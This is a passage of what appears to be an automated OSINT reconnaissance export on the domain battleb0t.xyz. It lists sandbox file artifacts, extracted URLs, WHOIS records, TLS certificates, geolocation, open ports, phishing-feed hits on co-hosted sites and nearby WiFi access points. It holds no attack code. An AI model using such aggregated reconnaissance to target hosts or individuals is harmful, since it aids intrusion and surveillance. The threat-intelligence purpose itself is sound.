[%TEMP%\\~DF5B01A6D2E18F9376.TMP]- [targetUID: 00000000-00003036]\n "P04A7CBK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P04A7CBK.txt]- [targetUID: 00000000-00003036]\n "cubam_1_.png" has type "PNG image data 1920 x 1080 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "styles_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "GBYF66MA.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\GBYF66MA.txt]- [targetUID: 00000000-00003220]\n "bandera_mexico_1_.png" has type "PNG image data 2203 x 1240 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_1D3EFA78-C97D-11ED-A555-08002718A46F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "https://github.com/StartBootstrap/startbootstrap-business-casual/blob/master/LICENSE"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "https://startbootstrap.com/theme/business-casual"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://use.fontawesome.com/releases/v6.1.0/js/all.js"\n Pattern match: "https://www.linkedin.com/in/iguerrerog/"\n Pattern match: "https://play.google.com/store/apps/details?id=com.StickyGames.PLCEmulatorProject"\n Pattern match: "https://fonts.googleapis.com/css?family=Lora:400,400i,700,700i"\n Pattern match: "https://fonts.googleapis.com/css?family=Raleway:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"\n Pattern match: "https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-MoFoq92mg.woff"\n Pattern match: 
"https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNDrMfJg.woff"\n Pattern match: "MUID06AC37517CFB670117FF258C7DB766BBmsn.com/1025424501094431100936425263449231022473*"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://ikerguerrero.dev/Accept-Language"\n Pattern match: "https://csp.withgoogle.com/csp/apps-themesCross-Origin-Resource-Policy"\n Pattern match: "http://ikerguerrero.dev"\n Pattern match: "http://ikerguerrero.dev/"\n Pattern match: "isdomainmigratedtruewww.msn.com/102584346316831058692425247824231022473*"\n Pattern match: "MUIDB1EE4D163B6736F882F96C3BEB73F6EBEieonline.microsoft.com/9216424501094431100936424779074231022473*"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787weuxJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI6MX1D_JOuGQbT0gvTJPa787z5vBJBkqs.woff"\n Pattern match: "https://fonts.gstatic.com/s/lora/v32/0QI8MX1D_JOuMw_hLdO6T2wV9KnW-C0Coq92mg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLDrMfJg.woff"\n Pattern match: "https://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLDrMf | 185.199.111.153 |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:8080 | 188.114.96.0/24 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/css;charset=utf-8 | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-fog.github.io]
https://www.openphish.com/feed.txt | 0-fog.github.io |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_1.jpeg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Gitea - Gitea is a forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, code review, kanban boards, tickets, and wikis. It supports self-hosting but also provides a free public first-party instance. | battleb0t.github.io |
| 2023-05-12 02:46:02 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 35.229.48.116 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:45:77) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00jew.github.io]
https://www.openphish.com/feed.txt | 00jew.github.io |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 69.170.74.34.bc.googleusercontent.com | 34.74.170.69 |
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | HTTP/3 | nuke.battleb0t.xyz |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 403 | https://ayhu.xyz/lol.html |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 03:37:23 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 46.101.229.70 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Flipboard (Category: tech)
https://flipboard.com/@login | login |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 34.74.170.74 |
| 2023-05-12 03:22:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.97.1:8080 | 188.114.97.1 |
| 2023-05-12 02:46:53 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | teamcity.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 2 19:58:42.072 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C3:06:C6:C9:50:41:7A:D7:6C:70:98:
51:7B:09:5D:89:5F:4F:70:26:E1:F3:55:05:EB:4B:EB:
4E:9B:F0:F2:88:02:20:0D:25:66:1C:2B:B5:DD:05:53:
30:99:F3:B4:0E:BD:C7:CD:B0:F0:5C:10:43:36:86:5F:
33:1B:1F:4F:B8:11:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 19:58:42.586 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B0:57:94:1E:8F:52:58:AA:CA:03:15:
81:F7:97:21:F9:28:45:54:DF:F1:77:F6:A5:EC:58:76:
D4:E4:12:AD:72:02:20:01:EE:79:67:15:46:B5:E0:30:
01:5F:EC:EA:1F:02:05:AC:32:1E:71:83:9E:36:A7:78:
3E:88:36:4C:5A:59:65
Signature Algorithm: sha256WithRSAEncryption
00:08:62:12:2d:66:22:5c:b5:95:b3:65:a0:38:13:b2:e8:94:
fc:c1:f0:43:eb:c7:1d:b0:f8:81:fa:e3:8a:ff:5b:71:ba:c9:
f0:8c:f7:2d:1c:f7:06:60:a9:cc:2b:a3:6a:74:56:5c:cc:ee:
dd:59:f1:89:1a:b3:64:77:7a:c3:42:25:ce:6f:ac:00:39:8c:
a8:ce:ab:de:74:9d:af:21:0a:8f:b8:da:c8:3a:34:04:13:53:
15:9a:a4:d4:ed:01:76:22:4f:b2:ec:9f:6d:03:d3:fa:18:6c:
67:6c:d6:b6:ce:7c:21:a4:1d:31:9c:0b:67:28:45:a7:ef:50:
97:79:ef:ba:a7:08:97:43:77:c8:c9:14:ff:92:90:23:36:be:
38:39:aa:a3:93:44:43:ea:01:c8:6f:d8:16:59:02:23:ab:26:
37:6a:12:88:93:b7:fe:c2:0d:03:0c:53:22:d8:37:25:ad:01:
bc:05:a2:c1:63:10:a5:01:dc:4e:2b:3f:07:57:03:2b:c0:d6:
50:e4:e1:65:6d:4b:fd:e0:d9:56:40:77:bf:53:f8:f8:15:43:
95:2f:e5:cc:d5:7e:3a:08:ae:5e:a2:25:e0:3f:95:7a:61:d1:
0e:7f:79:5b:19:24:0a:bf:5f:bd:78:ba:c9:ea:6b:b8:bc:16:
32:d8:03:9b
|
| 2023-05-12 03:24:21 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 03:41:36 | Physical Coordinates | No | AbstractAPI | 100 | 0 | 3 | 0 | None | 50.8897, 6.0563 | 45.131.109.53 |
| 2023-05-12 03:16:29 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'46.101.229.70', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'46.101.192.0/18', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 46.101.229.70 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domain Names REG.RU LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AGTLinksys (Net ID: 00:0C:41:75:B6:62) | 39.0469, -77.4903 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1F:B1:90) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PHILIPS_B81A7F (Net ID: 00:0B:3B:D9:1B:59) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT639BrM3 (Net ID: 38:3B:C8:ED:A2:0A) | 37.751, -97.822 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pokerstrategy (Category: gaming)
http://www.pokerstrategy.net/user/login/profile/ | login |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 00rz.com | 00rz.com |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Blogspot (Category: blog)
http://Altpapier.blogspot.com | Altpapier |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00feng00.github.io |
| 2023-05-12 02:46:55 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:54:05.304 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2E:CD:16:75:5B:83:CE:34:DE:4E:0B:A5:
8F:CD:7C:C7:A7:A6:A9:11:C3:23:E1:0B:2A:31:9F:95:
73:C3:42:80:02:20:7B:D0:4F:D2:8B:72:CA:32:B2:4D:
CC:40:AA:8E:75:E9:77:4A:4F:D1:BA:D8:AE:0C:6B:30:
9E:04:63:28:D1:A8
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:54:05.294 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:F1:66:52:35:FF:56:8B:1D:79:47:47:
A7:1C:C3:D5:F7:A4:62:11:6E:72:13:33:6A:75:28:8C:
74:B2:4C:10:76:02:20:1B:97:A6:E2:6C:65:7B:C8:CD:
9F:BB:59:01:45:C5:3A:6B:BD:4B:C8:1B:69:3F:61:01:
38:DF:1A:9C:5B:33:60
Signature Algorithm: sha256WithRSAEncryption
ae:79:f7:6d:1b:71:32:86:32:db:2a:16:1c:43:90:9b:83:62:
0f:e8:c8:45:a2:74:39:9e:47:95:60:f9:a9:0f:5f:8f:26:9e:
6a:cb:48:fc:28:9f:be:95:de:3f:18:f2:a2:6b:df:e9:ed:0e:
0c:fe:77:c0:f9:43:13:cf:28:62:3e:eb:89:e6:eb:03:ba:b6:
65:d3:6f:26:2f:e2:cd:15:59:82:3c:0e:ae:d9:44:2e:69:94:
35:68:67:b8:2a:60:2d:04:59:19:48:8b:a7:19:32:be:3f:d4:
97:45:fa:e8:74:5a:8f:72:87:86:27:6f:fd:8c:2b:a4:50:d9:
22:2e:d0:5b:e8:25:5b:f1:50:e7:fa:72:45:0e:76:e9:66:71:
c9:e1:a7:8b:e8:5b:83:ac:a2:bc:89:be:14:a7:12:48:15:b7:
d6:1e:fe:ad:98:76:3e:16:2c:cf:38:d6:a3:13:69:b2:c3:42:
11:42:e6:c6:c6:df:61:d7:1c:e4:ca:7f:bc:9e:71:30:82:fe:
d4:6f:58:81:ab:0e:55:97:bb:c1:5d:e3:30:ef:17:60:9b:37:
2f:f7:be:34:13:0e:a6:78:95:12:19:fc:1f:5c:b8:e7:4a:08:
f6:f1:db:51:99:1c:e2:4d:5a:42:03:0e:eb:74:29:12:8b:42:
4a:ad:db:87
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:66:94:56) | 50.1188, 8.6843 |
